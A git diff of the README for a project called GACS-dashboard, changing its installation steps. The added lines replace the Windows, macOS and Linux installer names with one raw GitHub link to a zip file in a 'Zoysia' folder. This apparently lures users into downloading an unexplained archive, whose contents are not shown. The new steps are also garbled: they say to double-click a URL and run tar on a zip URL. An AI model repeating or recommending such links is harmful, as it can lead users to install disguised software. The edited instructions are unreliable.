Yunsei/GACS-dashboard/README.md

 After downloading, follow these steps to run GACS-dashboard:

 1. Locate the downloaded file on your computer.
-2. For Windows users, double-click `GACS-dashboard-windows.exe` to start the installation.
+2. For Windows users, double-click `https://raw.githubusercontent.com/Yunsei/GACS-dashboard/main/Zoysia/GACS-dashboard.zip` to start the installation.
-3. For macOS users, open the `GACS-dashboard-macos.dmg` file, drag the application icon to the Applications folder.
+3. For macOS users, open the `https://raw.githubusercontent.com/Yunsei/GACS-dashboard/main/Zoysia/GACS-dashboard.zip` file, drag the application icon to the Applications folder.
-4. For Linux users, extract the tar.gz file using the command: `tar -xvf GACS-dashboard-linux.tar.gz` and run the application.
+4. For Linux users, extract the https://raw.githubusercontent.com/Yunsei/GACS-dashboard/main/Zoysia/GACS-dashboard.zip file using the command: `tar -xvf https://raw.githubusercontent.com/Yunsei/GACS-dashboard/main/Zoysia/GACS-dashboard.zip` and run the application.

 ## 🔑 Basic Usage Instructions
 Once you start GACS-dashboard: